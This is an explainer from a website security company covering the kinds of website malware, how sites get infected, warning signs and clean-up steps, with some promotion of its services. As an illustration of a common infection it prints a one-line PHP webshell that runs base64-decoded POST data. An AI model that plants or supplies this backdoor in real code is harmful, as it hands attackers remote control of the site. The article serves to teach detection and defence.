Key takeaways

  • Website malware is any code added to your site or server without permission to serve an attacker's goals.
  • The common types are webshells, backdoors, redirects, SEO spam, card skimmers and server-level persistence.
  • Most infections arrive through outdated plugins, stolen passwords or other infected sites on the same server.
  • Malware usually hides: a site that looks normal to you can still be serving spam or redirects to visitors and Google.
  • Removal means finding the entry point and every backdoor, not just deleting the file a scanner flagged.

What is website malware?

Website malware is any code placed on your website or server without your permission that works for an attacker instead of you. It might redirect visitors to scams, publish spam pages, steal card details, send email, mine cryptocurrency or simply keep a door open so the attacker can come back whenever they like.

The word "malware" is short for malicious software. On a laptop, people picture a virus that slows the machine down or locks files for ransom. On a website, malware is usually quieter. It is often a few lines of PHP or JavaScript tucked inside a legitimate file, a database row that injects a script into every page, or a small file with an innocent name sitting in your uploads folder.

The key difference from desktop malware is motive. A hacked website is valuable because of what it already has: search engine reputation, visitor traffic, a mail server, customer data and computing power. Attackers want to borrow those assets for as long as possible without you noticing, so most website malware is designed to stay hidden from the site owner.

What are the main types of website malware?

The main types of website malware are webshells, backdoors, malicious redirects, SEO spam injections, card skimmers, phishing kits, spam mailers and server-level persistence such as rogue cron jobs. Most real infections combine several of these: a webshell gets the attacker in, a backdoor keeps them in, and a payload such as spam or a redirect makes them money.

TypeWhat it doesTypical sign
WebshellA script that lets an attacker run commands and manage files through a browserUnknown PHP files in uploads or theme folders
BackdoorHidden code or accounts that let the attacker get back in after a clean-upMalware returning days after removal
RedirectSends some visitors to scam, adult or fake-prize pagesMobile or search visitors bounced elsewhere
SEO spamCreates pages or links for pharma, Japanese keyword or counterfeit goods spamStrange results in a site: search
Card skimmerCaptures payment details on checkout pagesCustomers reporting fraud after buying
Phishing kitHosts fake bank or login pages on your domainGoogle "Deceptive site ahead" warning
Spam mailerSends bulk email through your serverMail blocklisted, host complaints
Server persistenceCron jobs, systemd services or fake binaries that re-download malwareFiles reappearing within minutes

For a deeper look at the most dangerous of these, read our guide to webshells, and if the infection keeps returning, see why malware keeps coming back.

How does malware get onto a website?

Malware usually gets onto a website through a known vulnerability in an outdated plugin, theme or CMS core, through stolen or reused passwords, through pirated "nulled" plugins that arrive pre-infected, or from another compromised site sharing the same server account. Attackers rarely target you personally; automated tools scan the internet for any site with a weakness they can use.

Vulnerable plugins and themes

WordPress itself is generally well maintained, but a typical site runs twenty or more third-party plugins. When a vulnerability in one of them is disclosed, automated scanners start probing for it quickly. Sites that update weekly or monthly leave a window that bots are built to exploit.

Stolen credentials

Admin, FTP, SSH, hosting panel and database passwords are all ways in. Passwords reused from a breached service, shared by email with a developer years ago, or saved on an infected laptop are regularly used to log straight in without any exploit at all.

Cross-site contamination

If several sites share one hosting account or one Linux user, a single infected site can usually write to all the others. This is why we scan every site on the server, not just the one showing symptoms. Our guide to VPS security explains this in detail.

Nulled software

Premium themes and plugins downloaded free from unofficial sites frequently contain backdoors. The "saving" is paid back many times over in clean-up work.

Whichever route is used, the entry point matters as much as the malware itself. If you remove the infected files but leave the outdated plugin, the reused password or the infected neighbouring site in place, the attacker simply comes back the same way. Finding and closing the entry point is part of every proper clean-up.

Security triage

Is your site showing any of this?

Tell us what you’re seeing in two minutes and we’ll tell you what it means and what to do next. Hacked right now? Get emergency help.

Start the triage

What does website malware actually look like?

Website malware usually looks like obfuscated code: long strings of random characters passed through decoding functions such as base64_decode, gzinflate or str_rot13 and then executed. It is often injected at the very top or bottom of a legitimate file, or saved as a new file with a name designed to blend in with WordPress core files.

Here is a simplified example of what we commonly find prepended to a theme's functions.php:

<?php @eval(base64_decode($_POST['x'])); ?>
<?php
// Legitimate theme code continues below
add_action( 'after_setup_theme', 'acme_theme_setup' );

That single line turns the site into a remote-control tool: anyone who knows to send a POST request with the right parameter can run any PHP they like. Other common disguises include files named wp-cache.php, copies of class-wp-*.php files in the wrong folder, .ico or .png files that actually contain PHP, and <script> tags stored in the wp_options or wp_posts database tables.

Tip: legitimate plugins do sometimes use base64_decode. Finding it is a reason to investigate, not proof of infection. Context matters: where the file lives, when it changed and what calls it.

Why does website malware matter if the site still works?

Website malware matters even when the site appears to work, because it is usually designed to hide from you while harming your visitors, your search rankings and your reputation. Google may flag or de-index the site, hosts may suspend the account, email may be blocklisted, and stolen customer data can create legal obligations under UK GDPR.

  • Search visibility. Google Safe Browsing can show "This site may be hacked" or "Deceptive site ahead" warnings that stop most visitors clicking through. See how to remove a Google blacklist warning.
  • Revenue. Redirects and skimmers directly divert sales and damage customer trust.
  • Hosting. Providers often suspend accounts that send spam or host phishing pages.
  • Legal duties. If personal data may have been accessed, you may need to assess whether to report it to the ICO. Read website hacks and UK GDPR.
  • Onward attacks. Your server can be used to attack other sites, which can get your IP address blocked.

Many infections are also "cloaked": they only show spam or redirects to search engine crawlers or first-time mobile visitors, so the site owner, who is logged in and visits often, never sees a thing.

Malware also tends to grow. An attacker who gets in once will often install several independent backdoors, create a hidden administrator account and add a scheduled task that restores their files if you delete them. In one anonymised clean-up we handled, a single infected site had led to a rogue cron job re-downloading a webshell every minute and a reverse shell giving the attacker a live terminal on the server. The earlier an infection is found, the smaller the clean-up.

How do you check for and remove website malware?

To check for malware, start with an external check for blocklisting and visible symptoms, then scan the server itself, because most malware lives in files and databases that external scanners cannot see. Proper removal means cleaning every infected file and database entry, removing every backdoor and closing the entry point so it cannot return.

  1. Run an external check. Check Google's Safe Browsing site status for your domain, or tell us what you are seeing in our two-minute security triage.
  2. Scan server-side. A forensic scan of the file system, database, cron jobs and users finds what browser-based scanners miss. This is what our Forensic scan does.
  3. Clean and verify. Replace core files from known-good sources, remove injected code and rogue accounts, then rescan.
  4. Close the door. Patch the vulnerable component, rotate every credential and apply hardening such as blocking PHP execution in uploads.

If you would rather not do this yourself, PatientZero's malware removal service includes unlimited clean-ups, 24/7 monitoring and hardening from £99 a month per site, with no contract. If you think you have been hacked right now, go straight to our emergency help page.

Frequently asked questions

Is website malware the same as a computer virus?

Not quite. A computer virus infects a personal device. Website malware lives on a web server, in your site files, database or server configuration, and targets your visitors, search rankings and server resources. The two can be linked, for example when an infected laptop leaks your hosting password, but they are cleaned in different ways.

Can a small website really be targeted by malware?

Yes. Most website attacks are automated and indiscriminate. Bots scan huge numbers of sites for known weaknesses and infect whatever they find, regardless of size. A small business site with good search rankings and an outdated plugin is exactly what these tools are built to find.

Will a security plugin remove all website malware?

Security plugins are useful but limited. They run inside WordPress, so they cannot see malware in server cron jobs, system services or other sites on the same account, and some malware disables them. A server-side scan gives a much more complete picture.

How quickly should I act if I find malware?

As soon as possible. The longer malware stays, the more likely it is that Google flags the site, your host suspends it, customer data is exposed or the attacker adds more backdoors. Start by containing the problem and taking a backup for evidence, then clean it properly.

PatientZero Incident Response Team · Digital forensics and incident response

Written by the PatientZero incident response team: the engineers who investigate and clean compromised WordPress sites and Linux servers every week.